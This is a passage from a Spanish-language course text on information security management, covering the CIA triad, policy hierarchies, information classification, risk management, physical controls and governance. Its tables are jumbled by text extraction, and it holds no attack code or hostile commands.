Finalmente, la visión organizativa considera esencialmente la seguridad como un
elemento fundamental para el negocio, dado que permite asegurar que los procesos
de negocio se realizan sin disrupciones en cuanto a la confidencialidad, disponibilidad
e integridad de la información. La perspectiva organizativa de la seguridad se basa en
el análisis de riesgos, dado que el coste de las brechas o ataques contra la seguridad
es un elemento para evitar de difícil estimación. Esto incluye también los riesgos legales,
dado que en la mayoría de las empresas se guarda información personal, al menos, de
los clientes.
Podemos decir que la perspectiva organizativa y la legal indican qué hay que proteger
(lo establecido en la ley y los recursos importantes para la organización), por qué y de
qué (porque se protegen derechos de las personas frente a violaciones de la privacidad
o porque comprometer ciertos recursos de información afecta al negocio por acciones
de robo de información o espionaje industrial).
La perspectiva técnica se encarga del cómo hay que proteger desde el punto de vista
técnico (por ejemplo, si hay que utilizar ciertas actualizaciones de un sistema operativo, si
hay que desplegar honeypots o instalar un IDS) dependiendo de la tipología cambiante
de las amenazas (por ejemplo, la difusión generalizada de los smartphones requiere
medidas adicionales para este tipo de plataformas). La seguridad de la información en
una organización básicamente implica la protección de los activos necesarios para que
la organización cumpla con su misión frente al daño o la destrucción. Por esa naturaleza,
es una actividad crítica en la empresa. Dado que no puede conseguirse un nivel perfecto
de seguridad, la decisión del grado de seguridad (y el coste que se incurre en obtenerla)
es una decisión básica de gestión.
Desgraciadamente, en muchas ocasiones los usuarios perciben las medidas de seguridad
como controles innecesarios, engorrosos o excesivos. Por ello, los controles de seguridad
deben justificarse adecuadamente y la actitud de los empleados hacia la seguridad
debe ser objeto de formación, entrenamiento y explicación.
La seguridad es un proceso continuo de mejora y no un estado de un sistema,

por lo que las políticas y controles establecidos para la protección de la
información deberán revisarse, probarse y adecuarse, de ser necesario, ante
los nuevos riesgos que se identifiquen.
En este sentido, se puede decir que no existe un sistema de información perfectamente

seguro, dado que las amenazas evolucionan y también la propia organización y sus
recursos de información. No obstante, dependiendo de los procesos relacionados con la
seguridad, será más o menos fácil que se produzca una violación o brecha de seguridad
y también ésta tendrá más o menos impacto y será más o menos costosa de paliar.
La seguridad de la información se suele conceptualizar en torno a tres principios principales
ya mencionados: confidencialidad, integridad y disponibilidad.
Un sistema de información es un conjunto de componentes interrelacionados que
recogen, almacenan, procesan y distribuyen información para dar soporte a la toma de
decisiones y el control dentro de una organización.
Los componentes incluyen software y hardware pero también procedimientos, estructuras
organizativas y otros elementos. Hay que diferenciarlo del sistema informático. Para
estudiarlos, se debe utilizar una aproximación socio – técnica.
Ilustración 1. Gestión de información en el entorno organizativo
Por tanto, la gestión de la seguridad de los sistemas de información cubre todos los
elementos que aparecen en la anterior figura.
La seguridad de la información se suele conceptualizar en torno a tres principios principales
ya mencionados: confidencialidad, integridad y disponibilidad. A continuación, se
describe cada uno de ellos.

Ilustración 2. Principios penales de la seguridad de la información
Estos tres atributos pueden utilizarse como criterio para los controles de seguridad dentro
de las organizaciones. Sus atributos opuestos, de carácter negativo o no deseable, son la
revelación, la alteración y la destrucción.
LA CONFIDENCIALIDAD
La privacidad es quizá el aspecto que se menciona con más frecuencia en cuanto a la
confidencialidad. La privacidad de la información personal es un derecho protegido por
regulaciones internacionales y nacionales, pero no es más que una de las caras de la
confidencialidad.
En una empresa, la lista de los mejores proveedores en un área no es información personal,
pero obviamente su acceso debe estar limitado a ciertos empleados.
Otro ejemplo podría ser el código fuente de una aplicación informática desarrollada en
una empresa para su venta, ese código no debería revelarse y debería estar estrictamente
protegido. En otros casos, la confidencialidad está asociada a otras restricciones
externas. Por ejemplo, los planes de defensa por su naturaleza deben clasificarse como
confidenciales.
La confidencialidad es la propiedad de prevenir la relación y divulgación intencionada o

no intencionada de información a personas o sistemas no autorizados.
Las amenazas a la confidencialidad son múltiples y los medios para conseguir accesos
muy diversos. Una alternativa es la ingeniería social, que aprovecha el factor humano
para hacerse con información confidencial, pero también muchos troyanos tienen como
objeto extraer información confidencial de manera automática, por ejemplo.
Un ejemplo de técnica para obtener información confidencial es el conocido

phishing Con el auge de las redes sociales online como Facebook también ha
llegado el phishing especializado en estas redes. El ejemplo que se muestra debajo
es un mensaje de correo electrónico que aparentemente es una invitación a
hacer un contacto en Facebook. A pesar de que hay signos para reconocer que es
fraudulento (como el dominio aol.com del remitente), muchos usuarios caían en
la trampa. En este caso, el fraude permitiría acceder a la información privada de
nuestra cuenta de Facebook.
LA INTEGRIDAD
Quizá el ejemplo más típico de ataque contra la integridad sea la alteración de un balance
de una cuenta bancaria. Los ataques contra la integridad suelen implicar también
pérdidas de confidencialidad, pero no necesariamente.
En ocasiones, el intruso o persona no autorizada no modifica la información directamente,
sino que modifica alguno de los programas que la actualizan. De este modo, incluso
sin conocer el saldo de una cuenta bancaria, se puede reducir su cuantía mediante la
alteración deliberada del software, bien del programa en sí o del proceso en ejecución
del programa.
La integridad del apropiado buscará mantener los datos libres de modificaciones

no autorizadas.
Algunos autores consideran que la integridad debe también cubrir las modificaciones no
autorizadas por el personal autorizado, es decir, el control interno de las autorizaciones.
La integridad de la información se gestiona de acuerdo con tres principios básicos:
• Dar acceso de acuerdo con el criterio del menor privilegio (criterio need-to-
know).
• Separación de obligaciones (duties).
• Rotación de obligaciones.
El primero de los principios es muy simple. Solo se debe dar acceso a los usuarios a
aquellos recursos de información que les sean absolutamente imprescindibles para
realizar su trabajo. Yendo un paso más allá, este principio lleva a establecer controles
específicos para evitar que los usuarios puedan modificar información de maneras
que comprometan su integridad. Un ejemplo de este tipo de controles es un registro
de transacciones de las acciones del usuario, de modo que puedan inspeccionarse
posteriormente.
Análisis estático
El análisis de código estadístico es un conjunto de técnicas que analiza el código de
la aplicación para buscar vulnerabilidades. Las técnicas de taint analysis tratan de

explorar cómo los valores de entrada de la interfaz de usuario de una aplicación se
utilizan en el código para modificar los datos. Este análisis estático es un ejemplo de
control relacionado con la integridad.
El segundo de los principios implica que, para una determinada tarea, no haya nunca
un solo usuario responsable de realizarla. De esta manera, al menos habrá dos personas
implicadas y será más difícil que se utilice una manipulación de datos para beneficio
personal. El tercero de los principios va en la misma dirección y propone que las tareas
asignadas a los empleados cambien de responsable de vez en cuando. El problema con
la rotación es que, en empresas con pocos empleados en un determinado tipo de puesto,
puede ser difícil el intercambiar sus tareas.
LA DISPONIBILIDAD
Un sistema está disponible cuando sus usuarios legítimos pueden utilizarlo para realizar
funciones legítimas. Es decir, para realizar el trabajo necesario para el negocio.
La disponibilidad es la característica, cualidad o condición de la información

de encontrarse a disposición de quienes deben acceder a ella como usuarios
autorizados, ya sean personas, procesos o aplicaciones.
En el contexto de la seguridad de la información, habitualmente se habla de la

disponibilidad en dos situaciones típicas:
• Ataques de denegación de servicio (Denial of Service, DoS).

• Pérdidas de datos o capacidades de procesamiento de datos debidas a
catástrofes naturales (terremotos, inundaciones, etc.) o a acciones humanas
(bombas, sabotajes, etc.).
Los ataques DoS se han hecho populares en la web a través de los medios de comunicación.
Un ataque DoS sobre un sistema es básicamente un ataque por el cual los recursos de
cómputo del sistema se redirigen por medios externos a tareas que impiden su uso por
los usuarios legítimos.
Estos ataques frecuentemente se realizan mediante la infección previa de otros equipos
en la red sin el conocimiento de sus propietarios de modo que se coordinan para solicitar
el servicio de un determinado sitio web (como ocurre con las botnets).
Las pérdidas de datos por catástrofes naturales pueden parecer a muchas empresas
posibilidades remotas, por lo que en ocasiones tienden a subestimarse. Este tipo de
catástrofes o eventos sobrevenidos son el objeto de los planes de contingencia.
Un ejemplo son los sitios alternativos de proceso, que permiten continuar la operación

del negocio transfiriendo a otra infraestructura física alternativa. En el terreno técnico,
los avances en la computación tolerante a fallos son mecanismos que usualmente
combinan hardware y software para asegurar la disponibilidad.
OTROS CONCEPTOS PREVIOS IMPORTANTES

Además de la tríada que acabamos de describir, hay otros conceptos básicos importantes
que se deben tener en cuenta en la gestión de la seguridad y que conviene recordar en
este momento. La siguiente tabla los resume:
Tabla 1. Otros conceptos relevantes a la hora de trabaja de la gestión de la seguridad en la organización
CONCEPTO DEFINICIÓN EJEMPLO

El medio más
Medios por los que los conocido es la
SISTEMAS DE
usuarios reclaman su identificación
IDENTIFICACIÓN
identidad. mediante
usuario y clave.
La
comprobación
Evaluación de la
de la
evidencia de la
AUTENTICACIÓN contraseña
identidad de un
introducida con
usuario.
la almacenada
en el sistema.
La capacidad de un Los sistemas de
sistema de atribuir auditaría y las
RENDICIÓN DE CUENTAS
cada acción realizada bitácoras (logs)
(ACCOUNTABILITY)
en un usuario cumplen esta
determinado. función.
Los derechos y Derechos
permisos asignados de lectura o
AUTORIZACIÓN a un individuo con escritura sobre
respecto a los recursos determinados
del sistema. ficheros.
La forma y
grado en que
Nivel de los usuarios
confidencialidad dado de una red
PRIVACIDAD
a los usuarios de un social pueden
sistema. ver los datos
de los demás
usuarios.

1.2. La seguridad es un proceso
La seguridad no es un producto, algo que se pueda conseguir y una vez terminado,
se tiene. Por el contrario, la seguridad son actividades continúas realizadas dentro de
un plan sistemático que debe evaluarse continuamente. Es decir, la seguridad de la
información es un proceso. Los elementos fundamentales de ese proceso son los activos
de información, por eso la base de todo el proceso es su identificación, para después
aplicar una serie de herramientas de gestión.
La gestión de la seguridad implica la identificación de activos de información y el desarrollo,
documentación e implementación de políticas, normas, procedimientos y directrices que
garanticen su disponibilidad, integridad y confidencialidad.
Las herramientas de gestión (como la clasificación de datos, la formación y concienciación
sobre seguridad, la evaluación de riesgos y el análisis de riesgos) se utilizan para identificar
las amenazas, clasificar los activos y su vulnerabilidad para establecer controles de
seguridad eficaces.
Es importante distinguir las diferentes herramientas de gestión. En muchas ocasiones
se habla de políticas para hacer referencia a diferentes herramientas que se utilizan
en diferentes niveles de la gestión. Por ello, es importante hacer una clarificación
terminológica.
Ilustración 4. Jerarquía de herramientas y sus relaciones.
A continuación, se describen cada una de ellas.
POLÍTICA GENERAL DE SEGURIDAD

Esta es una política general de alto nivel y de carácter estratégico de la que se derivan
las demás. Típicamente contiene lo siguiente:
• Una declaración de la importancia de los recursos de información en la
empresa.
• Una declaración de compromiso de la dirección clara con la seguridad de la
información.
• Un compromiso de delegación a las políticas derivadas de ella.

POLÍTICAS FUNCIONALES
Estas políticas son también de alto nivel, por lo que indican qué debe hacerse, pero
no detallan el cómo (esto vendrá detallado concretamente en los procedimientos).
Típicamente, estas políticas afectan a un área funcional o un determinado tipo de
aplicación, como puede ser la política de uso del correo electrónico.
ESTÁNDARES, DIRECTRICES Y PROCEDIMIENTOS

Los estándares, directrices y procedimientos son medios para implementar las políticas.
Los estándares especifican el uso de ciertas tecnologías o métodos de un modo uniforme.
Son obligatorios y en ocasiones implican determinados compromisos con ciertos sistemas
operativos o fabricantes de software.
Las directrices son similares a los estándares, pero son solo recomendaciones, no son
de obligado cumplimiento. Son un mecanismo más flexible que pueden utilizarse para
determinar estándares.
Los procedimientos (a veces denominados prácticas) son descripciones detalladas de
los pasos para llevar a cabo una determinada tarea para que los usuarios los puedan
llevar a cabo sin dudas.
También mencionamos las líneas base (baselines) que son descripciones sobre cómo
configurar determinados elementos de seguridad para que sean aplicados de manera
uniforme en toda la organización.
Para comprender las diferencias, la siguiente tabla recoge un ejemplo concreto:
Tabla 2. Ejemplo de las diferencias entre políticas, estándares, directrices, procedimientos y líneas base.
Los responsables deben proveer un entorno de

Política procesamiento seguro en el que se mantenga la
seguridad de la información.
Los responsables deben utilizar la solución de antivirus de

Estándar
McAfee en todos los equipos de usuario.
Los usuarios de equipos deben atender a una sesión

Directriz on-line de formación sobre el uso de antivirus y su
importancia.
Todos los usuarios de equipos deben establecer la
Procedimiento actualización del antivirus corporativo con periodicidad
semanal. Los pasos por seguir son los siguientes: […]
La configuración del antivirus de McAfee por defecto en
Línea base las computadoras debe establecerse de acuerdo con los
siguientes parámetros: […]

En el ejemplo anterior, la política es aún de un nivel general. Es frecuente tener políticas
más específicas para cada tipo de aplicación a utilizar en la organización.
Por último, es importante recalcar que, aunque la nomenclatura varía de una entidad a
otra, la jerarquía siempre se debe tener tres niveles bien diferenciados. En primer lugar,
una ¡nivel estratégico que defina las líneas generales, a continuación, el nivel táctico que
profundice y complete las políticas y finalmente el nivel operativo que establezca como
implementar y cumplir los niveles superiores.
1.3. La clasificación de la información

No toda la información en la organización es igualmente valiosa. Por ejemplo, los secretos
industriales como la fórmula de fabricación de un producto afectan a la propia ventaja
competitiva y razón de ser de muchas empresas. Su revelación a terceros simplemente
puede terminar con la organización. Algo parecido ocurre con la información sobre la
estrategia de nuevos productos de una empresa, esa información es el objeto más
preciado del espionaje industrial.
Dado que la protección de la información cuesta dinero, clasificarla permite dedicar más
dinero a los recursos más valiosos.
En el entorno militar y el sector público, la clasificación de la información tiene una larga
historia. No obstante, es útil para cualquier organización, bien como mecanismo de
análisis o para evaluar qué información está afectada por determinadas protecciones
legales.
La clasificación de la información permite identificar el valor de los recursos de

información, incluyendo la información más sensible o vital para la empresa.
Clasificar la información además demuestra un compromiso con la seguridad y puede

ser imprescindible debido a regulaciones existentes.
NIVELES DE CLASIFICACIÓN
La clasificación suele hacerse en función de una serie de niveles. La siguiente tabla resume
una tipología habitual en los documentos en el entorno del gobierno.

Tabla 3. Clasificación de documentos en un entorno gubernamental.
TIPO DEFINICIÓN
Información no clasificada como sensible o

SIN CLASIFICAR clasificada. Por definición, la difusión de esta
información no afecta a la confidencialidad.
SENSIBLE PERO
Información que tiene un impacto menor si se difunde.
NO CLASIFICADA
La información que de ser difundida puede causar

CONFIDENCIAL
daño a la seguridad nacional.
SECRETA Su difusión causaría un daño importante.
ALTO SECRETO Su difusión causaría un daño extremadamente grave.
En el entorno de las empresas se utilizan otro tipo de clasificaciones. La siguiente tabla

proporciona un ejemplo.
Tabla 4. Clasificación de documentos en un entorno empresarial.
TIPO DEFINICIÓN
USO PÚBLICO Puede difundirse públicamente
Información que puede difundir internamente pero

USO INTERNO no externamente. Por ejemplo, información sobre los
proveedores y su eficiencia.
La información más sensible. Por ejemplo, información
CONFIDENCIAL sobre fórmulas de productos, productos nuevos o
fusiones empresariales en curso.
La anterior clasificación tiene que ver con el impacto en la empresa globalmente, pero
hay otra categoría, la de la información personal, cuya difusión está protegida por la ley
dado que afecta a los derechos de los individuos. Por ejemplo, el sueldo de un empleado
o la información médica sobre el mismo.
Además de los criterios de impacto en su difusión que acabamos de ver, la edad de la
información suele ser también un criterio, los documentos de defensa normalmente se

desclasifican tras un cierto tiempo, y una fórmula de un producto antiguo probablemente
ya no tenga el mismo valor si se ha imitado con el tiempo por los competidores.
ROLES Y PROCEDIMIENTOS EN LA CLASIFICACIÓN

La clasificación de la información requiere unos roles bien definidos y una serie de pasos
o actividades sistemáticas.
Los roles principales son los siguientes:
• Propietario (owner) del activo: el propietario es el encargado de la
protección de los recursos de información. Establece la criticidad de la
información de acuerdo con las políticas de clasificación aprobadas y
delega las tareas rutinarias al responsable.
• Responsable (custodian): normalmente es personal técnico, en quien
el propietario delega la custodia efectiva de la información. Esto incluye
la gestión de las copias de seguridad y cualquier otra tarea técnica
necesaria.
• Usuario: son los consumidores de la información en su trabajo diario.
Los principios fundamentales para este rol son los siguientes:
o La información y los recursos deben utilizarse para la organización,
nunca para usos personales.
o Son responsables de la gestión de la información que utilizan durante
su trabajo. Particularmente, tienen que cuidar que esa información
no quede a la vista. Un ejemplo es cerrar con password su terminal si
abandonan temporalmente su puesto.
o Deben comprender y aplicar las políticas y procedimientos de
seguridad de la organización.
Las actividades de clasificación pueden resumirse en las siguientes:

• Identificar los roles mencionados.
• Especificar los criterios de clasificación.
• Clasificar los datos por su propietario.
• Especificar y documentar cualquier excepción a la política de
clasificación.
• Especificar los controles que se aplican a cada nivel de clasificación.
• Especificar los procedimientos de terminación para la desclasificación
de la información o para la transferencia de custodia de la información a
otra entidad.
• Crear un programa de concienciación empresarial sobre la clasificación
y sus controles asociados.
1.4. La seguridad se articula con controles de seguridad

Toda la gestión de la seguridad de la información gira en torno de la identificación de
amenazas potenciales, es decir, de riesgos. Se trata de establecer mecanismos para
reducir su probabilidad de ocurrencia (en el sentido de posibilidad) o bien para disminuir
su impacto en caso de que finalmente la amenaza se materialice.

El control de seguridad tiene como objetivo reducir los efectos de una amenaza o
vulnerabilidad de la seguridad.
El establecimiento de un control de seguridad es consecuencia de un estudio previo del

impacto de determinadas vulnerabilidades o amenazas. El proceso estructurado que
produce estimaciones de las pérdidas por esas vulnerabilidades es el análisis de riesgos
(Risk Assessment).
Los conceptos de riesgo son la vara de medir para determinar si un control está bien
implementado o no. Por ejemplo, consideremos el siguiente control mencionado en la
norma ISO 27001:2013:
• Objetivo de control: responsabilidades del usuario
• Control o medida de ejemplo: uso de clave control: Se debe requerir que
los usuarios sigan buenas prácticas de seguridad en la selección y uso
de claves.
El riesgo en este caso redundaría en la pérdida de confidencialidad (y también de
integridad y/o disponibilidad, ya que la obtención de claves de usuarios puede permitir a
un intruso entrar en los sistemas y modificarlos).
La organización debe implementar este control en la forma de políticas (filosofía general
sobre las claves) y en procedimientos concretos (por ejemplo, cambios de contraseña
cada seis meses y uso de un comprobador de fortaleza de las contraseñas).
Esas medidas concretas, en este caso, permiten reducir la probabilidad de que un intruso
sea capaz de adivinar una clave y en el caso de que lo consiga, que su efecto (impacto)
sea temporal. No obstante, no permitirán eliminar el riesgo completamente, dado que un
ataque de ingeniería social puede engañar a un usuario para dar la clave a un software
malicioso (este sería el caso del phishing).
1.5. La seguridad en la información implica la gestión

de los riesgos
Todo el mundo tiene una noción intuitiva de qué es un riesgo. Asumir un riesgo es
equivalente a hacer una elección, dado que siempre que actuamos elegimos hacer algo
en lugar de dedicar nuestro tiempo y recursos a otras cosas.
En el dominio de la seguridad de la información los riesgos están asociados a eventos no
deseados, por ejemplo, el riesgo de tener un ataque de un cierto tipo y como consecuencia
sufrir un robo de datos personales.
No obstante, para poder medir con una cierta fiabilidad el impacto y la posibilidad de que
un evento no deseado suceda hay primero que analizar los elementos que componen
el riesgo y sus relaciones. Una vez un riesgo ha sido analizado y evaluado, hay varias
opciones. Se puede aceptar tal cual, tratar de tomar alguna medida para mitigarlo en su
impacto o en su probabilidad de ocurrencia o bien si fuera posible evitarlo o eliminarlo
completamente.
Hay una cuarta vía para la gestión del riesgo que realmente no actúa sobre el riesgo en
sí. Esta es la opción de transferir el riesgo, es decir, de recurrir a algún tipo de seguro para

que, en caso de ocurrencia del evento no deseado, haya una compensación económica.
Al conjunto de procesos de análisis, evaluación y planificación del riesgo se le denomina
gestión de riesgos.
1.6. La seguridad es tanto física como lógica

El dominio de la seguridad abarca todo aquello en el entorno de los sistemas de información
que puede tener un impacto en la disponibilidad, integridad y confidencialidad de la
información. Un desastre natural es un ejemplo de una amenaza física. Las medidas son
también de una variedad muy diversa, como los circuitos cerrados de televigilancia.
A pesar de que este dominio de la seguridad de la información puede parecer el más
alejado de la profesión en sí, es importante entenderlo, ya que el firewall mejor configurado
no podrá aguantar si alguien es capaz de acceder físicamente a la máquina que lo
ejecuta.
Donn B. Parker, en su libro La lucha contra los delitos informáticos, ha recopilado
una lista muy completa que él llama las siete principales fuentes de pérdidas
físicas, el siguiente es un resumen con ejemplos:
• Temperatura: variaciones extremas de la temperatura, por ejemplo, en
un incendio.
• Gases: gases de guerra como el gas Sarin, pero también gases
industriales o partículas en suspensión.
• Líquidos: agua de una inundación, líquidos utilizados en la limpieza.
• Organismos: virus, bacterias o insectos, por ejemplo. Pero también las
personas.
• Proyectiles: desde meteoritos a balas o explosiones.
• Movimientos: caídas o terremotos.
• Anomalías en la electricidad: magnetismo, radiaciones, etc.
Los controles de seguridad física son tan diversos como las amenazas. Las áreas
fundamentales que deben considerarse pueden resumirse en las que se presentan
a continuación.
CONTROLES ADMINISTRATIVOS
Incluyen todos los procedimientos administrativos (en oposición a los controles
propiamente físicos o técnicos).
Podemos mencionar los siguientes como aspectos fundamentales:
• Planificación de los requisitos de las instalaciones.
• Gestión de la seguridad de las instalaciones.
• Controles administrativos al personal.
CONTROLES DEL ENTORNO Y DE LA HABITABILIDAD

Son los controles físicos esenciales para mantener la operación de los sistemas y
del personal que los opera. Las siguientes son las áreas principales:
• Suministro eléctrico.
• Detección y supresión de incendios.
• Calefacción, ventilación y aire acondicionado.
CONTROLES TÉCNICOS Y FÍSICOS

En este apartado agrupamos controles que no son puramente administrativos (a
pesar de tener aspectos administrativos). Las principales áreas son las siguientes:
• Control del inventario de equipos. Esencialmente, el control del robo y el

daño a los equipos.
• Dispositivos de control de acceso a las instalaciones.
• Control de las condiciones de las instalaciones.
• Detección de intrusos y alarmas.
• Requisitos de los medios de almacenamiento.
1.7. La seguridad implica a las personas

Una percepción falsa relativamente extendida es la de que el mantenimiento de los
sistemas en cuanto al sistema operativo, software de red y aplicaciones, junto a sistemas
defensivos y políticas de seguridad escritas proporcionan un nivel adecuado de seguridad.
La realidad es que el elemento más débil del sistema de seguridad es en muchos casos
el factor humano.
La ingeniería social es la práctica y los métodos para obtener información confidencial a

través de la manipulación de usuarios legítimos.
Es importante entender que el factor humano es un elemento más del sistema de

información y como tal las políticas y las herramientas para implementarlas deben
tenerlos en cuenta.
1.8. Seguridad de la información y gestión de riesgos.

Garantizar la seguridad de la información es uno de los objetivos prioritarios de cualquier
organización, pues la información es uno de los activos más importantes con los que
cuentan las organizaciones y siempre ha estado amenazada, ya desde la antigüedad se
era consciente de la existencia de las amenazas a las que está expuesta la información
y se utilizaban medios para protegerla. Prueba de ello es que Julio César ya cifraba
sus mensajes con el conocido procedimiento que lleva su nombre, pero el auge en
la implantación de las Tecnologías de la Información y las Comunicaciones (TIC) ha
incrementado el número de amenazas a las que está expuesta, así como la probabilidad
de materialización de dichas amenazas.

Para proteger la información, que en sí es algo inmaterial pero que reside en diferentes
tipos de soportes -como pueden ser las personas, los documentos escritos o los sistemas
informáticos-, es necesario tomar las medidas de seguridad apropiadas para garantizar
el nivel de seguridad de la información que requiere una organización y así poder cumplir
con sus objetivos de negocio.
La seguridad de la información debe formar parte de todos los procesos de negocio de
una organización, tanto en el caso de los procesos manuales como automatizados, ya
que en todos ellos interviene la información de la organización como parte fundamental,
teniendo en cuenta además que dichos procesos involucran a personas, a tecnología y a
relaciones con socios de negocios, clientes o terceros.
Para proteger adecuadamente la información de una organización, primero, hay que dar
respuesta a cuatro preguntas clave: qué, dónde, cómo y cuándo.
¿QUÉ?
Hay que garantizar el acceso, integridad, disponibilidad, autenticidad, confidencialidad,
trazabilidad y conservación de la información de la organización. Tradicionalmente se
considera que la seguridad de la información consta de las siguientes dimensiones de
la seguridad:
Ilustración 5. Dimensiones de la seguridad

Adicionalmente a estas cinco dimensiones es necesario tener en cuenta otros dos
aspectos: garantizar el acceso y la conservación de la información, que pueden llegar
a considerarse parte de la dimensión «disponibilidad», pero que es necesario tratar de
forma específica por las características y peculiaridades de estos.
• Confidencialidad: es la garantía de que la información no es conocida
por personas, organizaciones o procesos que no disponen de la
autorización necesaria.
• Integridad: es la garantía de que la información no se ha transformado
ni modificado de forma no autorizada durante su procesamiento,
transporte o almacenamiento y que, además, permite detectar
fácilmente las posibles modificaciones que pudieran haberse producido.
• Disponibilidad: es la garantía de que la información es accesible en el
momento en el que los usuarios autorizados (personas, organizaciones o
procesos) tienen necesidad de acceder a ella.
• Autenticidad: es la garantía de la identidad del usuario que origina una
información. Permite conocer con certeza quién envía o genera una
información específica.
• Trazabilidad: es la garantía de que en todo momento se podrá
determinar quién hizo qué y en qué momento lo hizo.
• Conservación de la información: la conservación de la información no
se debe tratar de forma independiente, ya que, junto con la utilización
y acceso a la información, forma parte del ciclo de vida de esta. Es
necesario contemplar todas las fases del ciclo de vida de la información,
teniendo en cuenta las diferentes características de todos los tipos
de soporte, tanto cuando este es el papel, como cuando el soporte es
electrónico. La gestión de los dispositivos, de los soportes electrónicos y
de los formatos utilizados debe realizarse por medio de procedimientos
orientados a garantizar la conservación de la información, protegiendo
a los soportes en los que reside del deterioro, daño, robo o acceso
no autorizado. Estos procedimientos también deben contemplar los
procedimientos de destrucción o reutilización de soportes, que son
de aplicación cuando ha finalizado la vida útil de la información que
contienen o la de los propios soportes.
• Acceso: por acceso se entiende la capacidad de poder utilizar los
recursos de los sistemas de información y comunicaciones que nos
permiten acceder a la información.
¿DÓNDE ?
La información es almacenada, procesada y transmitida por los Sistemas de
Información y Comunicaciones (SIC), por lo tanto, para garantizar la seguridad en todas
sus dimensiones y aspectos es necesario garantizar la seguridad de los Sistemas de
Información y Comunicaciones de forma global.
Un Sistema de Información y Comunicaciones es un conjunto de elementos
interrelacionados, personas, datos/información, procedimientos y recursos técnicos,
dedicados al proceso y gestión de la información que una organización necesita para
alcanzar sus objetivos de negocio.
Hay que proteger todos y cada uno de los elementos que forman parte del Sistema de
Información y Comunicaciones de la organización frente a las amenazas a las que se

encuentran expuestos, teniendo en cuenta sus características y vulnerabilidades.
¿CÓMO?
Deben contrarrestarse todas las amenazas a las que está expuesta la información de una
organización por medio de la implantación de salvaguardas (controles) que pueden
actuar de alguna de las siguientes maneras:
• Minimizando la probabilidad de la materialización de una amenaza.

• Disminuyendo el impacto en la organización, si no se ha podido evitar la
materialización de una amenaza.
• Estableciendo procedimientos que permitan una recuperación rápida de
los daños sufridos y una vuelta a la operativa normal.
• Utilizando mecanismos que permitan modificar las salvaguardas de
acuerdo con la experiencia adquirida en los incidentes anteriores.
¿CUÁNDO?
La información hay que protegerla durante todo su ciclo de vida, desde el momento
en el que el dato entra en el sistema, hasta el momento en que deja de ser útil y se
procede a su destrucción, pasando por todas las fases del ciclo de vida de la información,
almacenamiento, proceso, transmisión y utilización.
ANÁLISIS Y GESTIÓN DE RIESGOS

Para que una organización pueda garantizar de forma adecuada la seguridad de uno de
sus principales activos, la información, es necesario que analice y gestione los riesgos a
los que está expuesta.
Para que una organización pueda conocer los riesgos a los que está expuesta debe
conocer el entorno, tanto externo como interno, en el que desarrolla sus procesos de
negocio. Para alcanzar este conocimiento deben estudiarse tanto las fuentes externas,
que le aportarán información de riesgos generales, como las fuentes internas, que le van
a permitir valorar el grado en el que los riesgos de carácter general le son de aplicación.
Una de las fuentes internas más importantes es el histórico de incidentes.
Por medio del análisis de riesgos, una organización obtiene el conocimiento de a qué
está expuesta, lo que le permitirá identificar los riesgos que le podrían impedir lograr sus
objetivos de negocio, determinando su magnitud e identificando las áreas que requieran
medidas de salvaguarda o controles en función del riesgo detectado.
El análisis de riesgos intenta que los criterios en los que se apoya la seguridad sean más
objetivos, permitiendo a la organización gestionar sus riesgos y tomar decisiones en base

a los riesgos propios.
Teniendo en cuenta que la mitigación total de los riesgos es imposible, la gestión de
riesgos tiene como objetivo gestionar o tratar el riesgo hasta disminuir el riesgo residual
a los niveles asumibles por la dirección y debe:
• Ser una parte integral de todos los procesos de negocio.

• Crear y proteger el valor.
• Formar parte de la toma de decisiones.
• Tratar explícitamente la incertidumbre.
• Ser sistemática, estructurada y oportuna.
• Estar basada en la mejor información posible.
• Ser adaptable.
• Integrar factores humanos y culturales.
• Ser transparente y participada por las partes interesadas de la
organización.
• Ser dinámica, iterativa y responder a los cambios.
• Facilitar la mejora continua.
1.9. Política de Seguridad de la Información.

La política de seguridad de la información recogerá las directrices y los principios de alto
nivel que rigen las actividades de seguridad de la organización; al igual que, los objetivos
y responsabilidades que se demandarán a los diferentes participantes en la gestión de
la seguridad de la información.
Una política de seguridad, como declaración de principios de la organización, debe
plasmar las directrices generales y principios de actuación que seguirá la organización
en materia de seguridad, así como la estrategia a seguir para la definición de objetivos. La
política de seguridad debe ser un documento robusto y a la vez lo suficientemente preciso
para que se pueda aplicar de forma horizontal en toda la organización, de tal forma que
desde el primero hasta el último pueda cumplirla. A partir de ella, se desarrollará todo el
cuerpo normativo y se establecerán los procedimientos acordes a la misma.
La política de seguridad debe establecerse en términos de negocio e identificar las
características de la organización. Debe reflejar los objetivos en materia de seguridad de
la información, así como reflejar las obligaciones contractuales y legales. La política de
seguridad debe estar alineada con la estrategia de gestión de riesgos de la organización
y establecer los criterios para la valoración de estos. Finalmente, la política de seguridad
debe estar aprobada por la alta dirección como muestra de su patrocinio y compromiso
con la seguridad.
El desarrollo de una política de seguridad debe ser un proceso robusto sobre el que se
sienten las bases para el éxito de la gestión de la seguridad en la organización.

2. Gobernanza y buenas
prácticas de la seguridad de
la información
2.1. Gobierno de la seguridad de la información.
La gobernanza es el conjunto de responsabilidades y prácticas ejercidas por la Dirección

con la finalidad de brindar una dirección estratégica, garantizar que se logren los
objetivos, determinar que los riesgos se administren en forma apropiada y verificar que
los recursos de la empresa se utilicen con responsabilidad.
De forma más pormenorizada y focalizándolo en la seguridad de la información, el
gobierno de la seguridad trata de:
Dar una dirección estratégica y apoyar la consecución de objetivos
• Se debe alinear la seguridad de la información con la estrategia de
negocio para apoyar los objetivos de la organización.
• Asimismo, se optimizarán las inversiones en la seguridad en apoyo a los
objetivos del negocio.
Gestionar adecuadamente los riesgos
• Identificar y valorar los riesgos que se ciernen sobre la organización.
• Se deben implantar medidas adecuadas para mitigar los riesgos y
reducir el impacto potencial que tendrían en los recursos de información
a un nivel aceptable.
Verificar que los recursos se utilicen con responsabilidad
• Se buscará utilizar el conocimiento y la infraestructura disponible de la
mejor forma posible.
• Se deberá controlar y monitorizar la eficacia y la eficiencia de los
controles ya implantados.
VISIÓN, MISIÓN Y OBJETIVOS EN EL GOBIERNO DE LA SEGURIDAD

Al igual que el gobierno corporativo define una visión, una misión y unos objetivos que
dotan a la organización de sus fundamentos estratégicos, el gobierno de la seguridad de
la información debe definir una estrategia para cooperar en las metas definidas.

Ilustración 6. Visión, misión, objetivos y estrategia en el gobierno de la seguridad
Misión de la seguridad: descripción de por qué la seguridad de la información es relevante

en la organización. Describe una realidad prácticamente invariable en el tiempo y que
puede lograrse de diversas formas, sirviendo de contexto para la toma de decisiones en
la entidad.
